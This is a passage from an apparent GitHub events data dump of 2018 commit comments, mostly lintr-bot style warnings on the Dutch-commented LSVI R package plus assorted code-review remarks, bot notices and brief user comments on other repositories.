Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:119:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/invoercontroleData_soortenKenmerken.R#L119) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:63:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/invoercontroleData_voorwaarden.R#L63) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:64:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/invoercontroleData_voorwaarden.R#L64) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:475:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_1_databank.R#L475) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:476:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_1_databank.R#L476) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:555:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis.R#L555) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:556:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis.R#L556) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:21:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L21) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  mutate(  #idee is om onderstaande code te wissen zodra de databank/rekenmodule hiervoor aangepast is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:55:3:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L55) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:56:3:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L56) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-30T11:05:42Z"}
{"id":"8037019310","type":"CommitCommentEvent","actor":{"login":"YuanlinLi"},"repo":{"name":"YuanlinLi/root"},"payload":{"comment":{"id":29885019,"position":1,"line":1,"path":"README.md","commit_id":"16765a3c4cd93c09158ffd32dbe9a97566d2a982","created_at":"2018-07-30T11:07:43Z","updated_at":"2018-07-30T11:07:43Z","author_association":"OWNER","body":"`There remains nothing to knowledge.`"}},"created_at":"2018-07-30T11:07:43Z"}
{"id":"8037019772","type":"CommitCommentEvent","actor":{"login":"dragos"},"repo":{"name":"epfl-lara/stainless"},"payload":{"comment":{"id":29885020,"position":null,"line":null,"path":null,"commit_id":"5ed680fd622dd4383522cd6b5d6b75d5e2ced3aa","created_at":"2018-07-30T11:07:49Z","updated_at":"2018-07-30T11:07:49Z","author_association":"CONTRIBUTOR","body":"Should `@ghost` allow assignments to ghost fields/does pureness in stainless forbid assignments?"}},"created_at":"2018-07-30T11:07:49Z"}
{"id":"8037026817","type":"CommitCommentEvent","actor":{"login":"bsipocz"},"repo":{"name":"astropy/sphinx-automodapi"},"payload":{"comment":{"id":29885034,"position":null,"line":null,"path":null,"commit_id":"23d9f1254599b3b70664ddb634c3dd11d56e30f8","created_at":"2018-07-30T11:09:30Z","updated_at":"2018-07-30T11:09:30Z","author_association":"MEMBER","body":"@astrofrog  duncanmmacleod - I suppose this should get inherited from sphinx-astropy, shound't it? https://github.com/astropy/sphinx-astropy/blob/master/sphinx_astropy/conf/v1.py#L160 https://github.com/astropy/package-template/blob/cookiecutter/%7B%7B%20cookiecutter.package_name%20%7D%7D/docs/conf.py#L33\r\n\r\nIf it didn't, then this is also a bug in the template."}},"created_at":"2018-07-30T11:09:30Z"}
{"id":"8037027585","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29885035,"position":null,"line":null,"path":null,"commit_id":"249b16e8e3417cb45cc0209220f509573e9d22d6","created_at":"2018-07-30T11:09:41Z","updated_at":"2018-07-30T11:09:41Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/improving-the-category-list-in-the-hamburger-menu/92739/38\n"}},"created_at":"2018-07-30T11:09:41Z"}
{"id":"8037029784","type":"CommitCommentEvent","actor":{"login":"qq719078369"},"repo":{"name":"xfhy/notes"},"payload":{"comment":{"id":29885038,"position":null,"line":null,"path":null,"commit_id":"fd8c11507ebe7dfac5ad8aa677aff7cbd745f14c","created_at":"2018-07-30T11:10:12Z","updated_at":"2018-07-30T11:10:12Z","author_association":"NONE","body":"six,six,six"}},"created_at":"2018-07-30T11:10:12Z"}
{"id":"8037031538","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29885043,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-30T11:10:37Z","updated_at":"2018-07-30T11:10:37Z","author_association":"NONE","body":"你好，请问钱包更新了吗？可以转IQ了吗？"}},"created_at":"2018-07-30T11:10:37Z"}
{"id":"8037033509","type":"CommitCommentEvent","actor":{"login":"uhussain"},"repo":{"name":"uhussain/UWVV"},"payload":{"comment":{"id":29885047,"position":null,"line":null,"path":null,"commit_id":"a58c269f42435deb04bf5beb2002fa37d2d87391","created_at":"2018-07-30T11:11:04Z","updated_at":"2018-07-30T11:11:04Z","author_association":"OWNER","body":"https://twiki.cern.ch/twiki/bin/viewauth/CMS/HiggsZZ4l2018#Muons"}},"created_at":"2018-07-30T11:11:04Z"}
{"id":"8037034963","type":"CommitCommentEvent","actor":{"login":"romac"},"repo":{"name":"epfl-lara/stainless"},"payload":{"comment":{"id":29885054,"position":null,"line":null,"path":null,"commit_id":"5ed680fd622dd4383522cd6b5d6b75d5e2ced3aa","created_at":"2018-07-30T11:11:25Z","updated_at":"2018-07-30T11:11:25Z","author_association":"MEMBER","body":"Yeah I believe it should. Such code would indeed be rejected at the moment. I'll look into that!"}},"created_at":"2018-07-30T11:11:25Z"}
{"id":"8037040195","type":"CommitCommentEvent","actor":{"login":"uhussain"},"repo":{"name":"uhussain/UWVV"},"payload":{"comment":{"id":29885060,"position":null,"line":null,"path":null,"commit_id":"c74556e478b8f8fd22da5760fc270caf7fd98543","created_at":"2018-07-30T11:12:38Z","updated_at":"2018-07-30T11:12:38Z","author_association":"OWNER","body":"Fall17IsoV2 instead of V1Value\r\nhttps://twiki.cern.ch/twiki/bin/viewauth/CMS/HiggsZZ4l2018#Electrons"}},"created_at":"2018-07-30T11:12:38Z"}
{"id":"8037041466","type":"CommitCommentEvent","actor":{"login":"ziyi2"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885062,"position":44,"line":44,"path":"server/graphql/tools/bitbucket-codereview-tools.js","commit_id":"9fccd5ee5e7e5782f6d738105238d8f738071daa","created_at":"2018-07-30T11:12:55Z","updated_at":"2018-07-30T11:12:55Z","author_association":"NONE","body":"建议\r\nnew Array(2).fill(0)"}},"created_at":"2018-07-30T11:12:55Z"}
{"id":"8037041649","type":"CommitCommentEvent","actor":{"login":"sca-"},"repo":{"name":"sca-/webpack-watch-time-plugin"},"payload":{"comment":{"id":29885063,"position":null,"line":null,"path":null,"commit_id":"3d9b012764e77a4f308bc8f8b022b58092b3c77f","created_at":"2018-07-30T11:12:58Z","updated_at":"2018-07-30T11:12:58Z","author_association":"OWNER","body":"resolve #3 "}},"created_at":"2018-07-30T11:12:58Z"}
{"id":"8037045836","type":"CommitCommentEvent","actor":{"login":"ziyi2"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885071,"position":58,"line":58,"path":"server/graphql/tools/bitbucket-codereview-tools.js","commit_id":"9fccd5ee5e7e5782f6d738105238d8f738071daa","created_at":"2018-07-30T11:13:57Z","updated_at":"2018-07-30T11:13:57Z","author_association":"NONE","body":"高级缺陷\r\ncommitFiles[0].lineComments可以缓存"}},"created_at":"2018-07-30T11:13:57Z"}
{"id":"8037047064","type":"CommitCommentEvent","actor":{"login":"MrSean1"},"repo":{"name":"BJ1804/bbs11"},"payload":{"comment":{"id":29885075,"position":1,"line":1,"path":"zheshilaji.txt","commit_id":"0eac139f4a349e32c22f7241b5d67378c0626786","created_at":"2018-07-30T11:14:14Z","updated_at":"2018-07-30T11:14:14Z","author_association":"CONTRIBUTOR","body":"真是垃圾"}},"created_at":"2018-07-30T11:14:14Z"}
{"id":"8037050318","type":"CommitCommentEvent","actor":{"login":"ziyi2"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885078,"position":11,"line":9,"path":"server/graphql/models/index.js","commit_id":"af67cb25d3bbbff4586d02efc0afbf4b8c2e30e8","created_at":"2018-07-30T11:15:00Z","updated_at":"2018-07-30T11:15:00Z","author_association":"NONE","body":"建议\r\n20最好加注释说明"}},"created_at":"2018-07-30T11:15:00Z"}
{"id":"8037051533","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/jsonref-feedstock"},"payload":{"comment":{"id":29885081,"position":null,"line":null,"path":null,"commit_id":"96617b14c5d8853f6d91d1aedd78932183aeccac","created_at":"2018-07-30T11:15:16Z","updated_at":"2018-07-30T11:15:16Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @chapmanb was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-30T11:15:16Z"}
{"id":"8037052841","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29885084,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-30T11:15:33Z","updated_at":"2018-07-30T11:15:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T11:15:33Z"}
{"id":"8037057116","type":"CommitCommentEvent","actor":{"login":"ziyi2"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885100,"position":37,"line":110,"path":"server/graphql/proxy/commit.js","commit_id":"f5affb2eaa53129d1f2d8b2f886679045032f807","created_at":"2018-07-30T11:16:31Z","updated_at":"2018-07-30T11:16:31Z","author_association":"NONE","body":"建议\r\n1强加注释说明"}},"created_at":"2018-07-30T11:16:31Z"}
{"id":"8037058300","type":"CommitCommentEvent","actor":{"login":"vasylkulyev"},"repo":{"name":"vasylkulyev/mikrotik_tune"},"payload":{"comment":{"id":29885102,"position":12,"line":12,"path":"AP-any.rsc","commit_id":"b2017a38411eb075f20f9a673d001dc5e422477b","created_at":"2018-07-30T11:16:48Z","updated_at":"2018-07-30T11:16:48Z","author_association":"OWNER","body":"aaa"}},"created_at":"2018-07-30T11:16:48Z"}
{"id":"8037063984","type":"CommitCommentEvent","actor":{"login":"wei9812"},"repo":{"name":"wei9812/configserver"},"payload":{"comment":{"id":29885109,"position":3,"line":1,"path":"src/main/java/aaa.txt","commit_id":"adce1c5d059fbaf7f097d147e87a1b65b1efe994","created_at":"2018-07-30T11:18:08Z","updated_at":"2018-07-30T11:18:08Z","author_association":"OWNER","body":"你妈卖批"}},"created_at":"2018-07-30T11:18:08Z"}
{"id":"8037069905","type":"CommitCommentEvent","actor":{"login":"ziyi2"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885119,"position":18,"line":39,"path":"components/CommitManagerDialog.vue","commit_id":"71e52efe480bc913de77250e2e0bc24577e9131d","created_at":"2018-07-30T11:19:29Z","updated_at":"2018-07-30T11:19:29Z","author_association":"NONE","body":"中级缺陷\r\n[推荐]  3个特性以上的元素应该分多行撰写，每个特性一行。"}},"created_at":"2018-07-30T11:19:29Z"}
{"id":"8037070754","type":"CommitCommentEvent","actor":{"login":"sashaaero"},"repo":{"name":"ponyorm/pony"},"payload":{"comment":{"id":29885126,"position":9,"line":103,"path":"pony/migrate/serializer.py","commit_id":"56294677e98caef0d572b5071a7ed298d70c0723","created_at":"2018-07-30T11:19:41Z","updated_at":"2018-07-30T11:19:41Z","author_association":"MEMBER","body":"Wow! Your code is so good!"}},"created_at":"2018-07-30T11:19:41Z"}
{"id":"8037072178","type":"CommitCommentEvent","actor":{"login":"peidi19870822"},"repo":{"name":"peidi19870822/test"},"payload":{"comment":{"id":29885130,"position":3,"line":1,"path":"a1.txt","commit_id":"c532e74a2e030a60132c351141f97b9728ff659b","created_at":"2018-07-30T11:20:00Z","updated_at":"2018-07-30T11:20:00Z","author_association":"OWNER","body":"修改一下"}},"created_at":"2018-07-30T11:20:00Z"}
{"id":"8037074516","type":"CommitCommentEvent","actor":{"login":"ziyi2"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885138,"position":97,"line":192,"path":"components/CommitManagerDialog.vue","commit_id":"71e52efe480bc913de77250e2e0bc24577e9131d","created_at":"2018-07-30T11:20:32Z","updated_at":"2018-07-30T11:20:32Z","author_association":"NONE","body":"高级缺陷\r\n[强烈推荐] 行注释和块注释。\r\n方法注释不对"}},"created_at":"2018-07-30T11:20:32Z"}
{"id":"8037076170","type":"CommitCommentEvent","actor":{"login":"MihaZupan"},"repo":{"name":"TelegramBots/Telegram.Bot"},"payload":{"comment":{"id":29885146,"position":4,"line":3,"path":"LICENSE","commit_id":"50dc9649b277ce280b06052b27584257aa34ff1c","created_at":"2018-07-30T11:20:55Z","updated_at":"2018-07-30T11:20:55Z","author_association":"MEMBER","body":"For my dose of OCD I have to ask you to remove that space in the year range.\r\nI'll merge after"}},"created_at":"2018-07-30T11:20:55Z"}
{"id":"8037078124","type":"CommitCommentEvent","actor":{"login":"codingjoe"},"repo":{"name":"applegrew/django-select2"},"payload":{"comment":{"id":29885153,"position":24,"line":77,"path":"django_select2/conf.py","commit_id":"1954bf57fafee0f27a7b444b1a468331ac2af9b3","created_at":"2018-07-30T11:21:24Z","updated_at":"2018-07-30T11:21:24Z","author_association":"COLLABORATOR","body":"hi @peterdemin ok, I see what you mean. We never supported 3.5 in version 3.x though. Anyhow. I am not against a patch if you would provide one. If you can't I can create a major new release, but I can't roll back the already released version.\r\n\r\nAgain, if you want to invest time to patch this, I would be willing to merge."}},"created_at":"2018-07-30T11:21:24Z"}
{"id":"8037081984","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29885167,"position":null,"line":null,"path":null,"commit_id":"2c7b03704e2835b0da43b867bb43713adc057a5f","created_at":"2018-07-30T11:22:19Z","updated_at":"2018-07-30T11:22:19Z","author_association":"MEMBER","body":"It's a merge commit, why is it called `Rebase to master`? It sounds confusing to me.\r\nAlso when I asked to rebase I meant literally rebase, though I wouldn't object to a merge, but only if commit history prior to merge was fixed before that. Anyway, it's too late now, I suppose."}},"created_at":"2018-07-30T11:22:19Z"}
{"id":"8037084772","type":"CommitCommentEvent","actor":{"login":"ziyi2"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885177,"position":44,"line":44,"path":"pages/check/index/list.vue","commit_id":"71e52efe480bc913de77250e2e0bc24577e9131d","created_at":"2018-07-30T11:22:59Z","updated_at":"2018-07-30T11:22:59Z","author_association":"NONE","body":"高级缺陷\r\n[强烈推荐]  避免使用魔鬼数字和魔鬼字符串。"}},"created_at":"2018-07-30T11:22:59Z"}
{"id":"8037085925","type":"CommitCommentEvent","actor":{"login":"GuGu910"},"repo":{"name":"integralstor/integralstor"},"payload":{"comment":{"id":29885181,"position":null,"line":null,"path":null,"commit_id":"30d348c2cab142ab35e715f501f2cb4714f8a46a","created_at":"2018-07-30T11:23:16Z","updated_at":"2018-07-30T11:23:16Z","author_association":"NONE","body":"getting only name and quota for the user and group into the respective dictionary."}},"created_at":"2018-07-30T11:23:16Z"}
{"id":"8037088553","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29885191,"position":null,"line":null,"path":null,"commit_id":"1b810705475d3dd14100ede21430d567d44a0a3d","created_at":"2018-07-30T11:23:51Z","updated_at":"2018-07-30T11:23:51Z","author_association":"NONE","body":"[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/1b810705475d3dd14100ede21430d567d44a0a3d/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be 